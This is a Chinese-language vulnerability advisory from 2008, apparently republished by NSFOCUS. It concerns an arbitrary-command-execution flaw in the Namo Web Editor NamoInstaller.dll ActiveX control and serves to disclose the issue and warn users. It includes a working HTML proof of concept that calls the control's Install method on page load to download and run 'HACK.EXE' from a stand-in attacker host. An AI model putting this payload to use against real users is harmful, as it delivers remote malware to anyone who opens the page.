安全研究

安全漏洞
Namo Web Editor NamoInstaller.dll ActiveX控件任意命令执行漏洞

发布日期:2008-01-25
更新日期:2008-01-29

受影响系统:
SJ NAMO Web Editor NamoInstaller.dll 3.0.0.1
描述:
BUGTRAQ  ID: 27453

Namo Web Editor是一个软件包,允许Web应用人员为网站用户提供创建文档、上传文件等支持。

Namo Web Editor的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞在用户系统上执行任意命令。

Namo Web Editor软件包中所安装的NamoInstaller.NamoInstall.1 ActiveX控件(NamoInstaller.dll)没有正确地验证对Install()方式的输入参数,如果用户受骗访问了恶意网页并向该方式传送了恶意参数的话,就可能导致下载并执行恶意程序。

<*来源:plan-s (http://www.Plan-S.cn)
  
  链接:http://secunia.com/advisories/28649/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<html>
<head>
  <title>Namo Web Editor NamoInstaller.dll install Method Exploit</title>
  <script language="JavaScript" defer>
    function Check()
   {
          obj.Install("http://ATTACKER.COM/HACK.EXE")          
          
    }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:AF465549-1D22-4140-A273-386FA8877E0A" height="0" width="0">
     Unable to create object
    </object>
</body>
</html>

建议:
厂商补丁:

SJ NAMO
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.namo.com/

浏览次数:2698
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障